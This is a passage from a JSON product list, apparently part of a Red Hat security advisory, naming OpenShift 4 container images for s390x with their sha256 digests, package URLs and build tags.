"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"product_id": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-container-networking-plugins-rhel9@sha256%3A176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605056"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-resizer-rhel9@sha256%3A5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564121"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-snapshotter-rhel9@sha256%3A15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563469"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"product_id": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-snapshot-controller-rhel9@sha256%3A9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564451"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"product_id": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-etcd-rhel9@sha256%3A640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573039"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"product": {
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"product_id": "registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/frr-rhel9@sha256%3A47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602311"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"product_id": "registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibm-cloud-controller-manager-rhel9@sha256%3Ab692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775561999"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"product_id": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibm-vpc-block-csi-driver-rhel9@sha256%3A36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557304"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"product_id": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256%3A0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775566494"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"product_id": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibmcloud-cluster-api-controllers-rhel9@sha256%3Ae0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572733"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"product_id": "registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibmcloud-machine-controllers-rhel9@sha256%3Abf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775566505"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"product_id": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-insights-rhel9-operator@sha256%3Ac5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573055"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"product": {
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"product_id": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/insights-runtime-exporter-rhel9@sha256%3A8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605722"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"product": {
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"product_id": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/insights-runtime-extractor-rhel9@sha256%3A17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565133"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"product_id": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-rhel9@sha256%3A10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775612266"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"product_id": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-artifacts-rhel9@sha256%3A60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775612304"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"product": {
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"product_id": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/kube-metrics-server-rhel9@sha256%3A4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605620"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"product_id": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-storage-version-migrator-rhel9@sha256%3Ab77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604115"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"product_id": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kubevirt-cloud-controller-manager-rhel9@sha256%3A805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565007"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"product": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"product_id": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/kubevirt-csi-driver-rhel9@sha256%3A01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604912"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"product_id": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-libvirt-machine-controllers-rhel9@sha256%3A7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604362"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-rhel9-operator@sha256%3A042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607009"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-openstack-rhel9@sha256%3A81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564642"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"product_id": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-config-rhel9-operator@sha256%3A542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604341"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"product_id": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-os-images-rhel9@sha256%3A32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775619097"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"product_id": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-admission-controller-rhel9@sha256%3Ab91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604704"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"product_id": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-route-override-cni-rhel9@sha256%3A4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605900"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"product_id": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-whereabouts-ipam-cni-rhel9@sha256%3A5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605545"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"product_id": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-must-gather-rhel9@sha256%3A85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564698"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"product_id": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-network-interface-bond-cni-rhel9@sha256%3A8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605259"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"product_id": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-network-metrics-daemon-rhel9@sha256%3Ace9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605534"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"product": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"product_id": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/network-tools-rhel9@sha256%3A083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607479"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"product_id": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-apiserver-rhel9@sha256%3Aaa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605934"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"product_id": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-olm-catalogd-rhel9@sha256%3A3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604244"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"product_id": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-olm-operator-controller-rhel9@sha256%3A5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604309"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"product_id": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"product_identification_helper": {
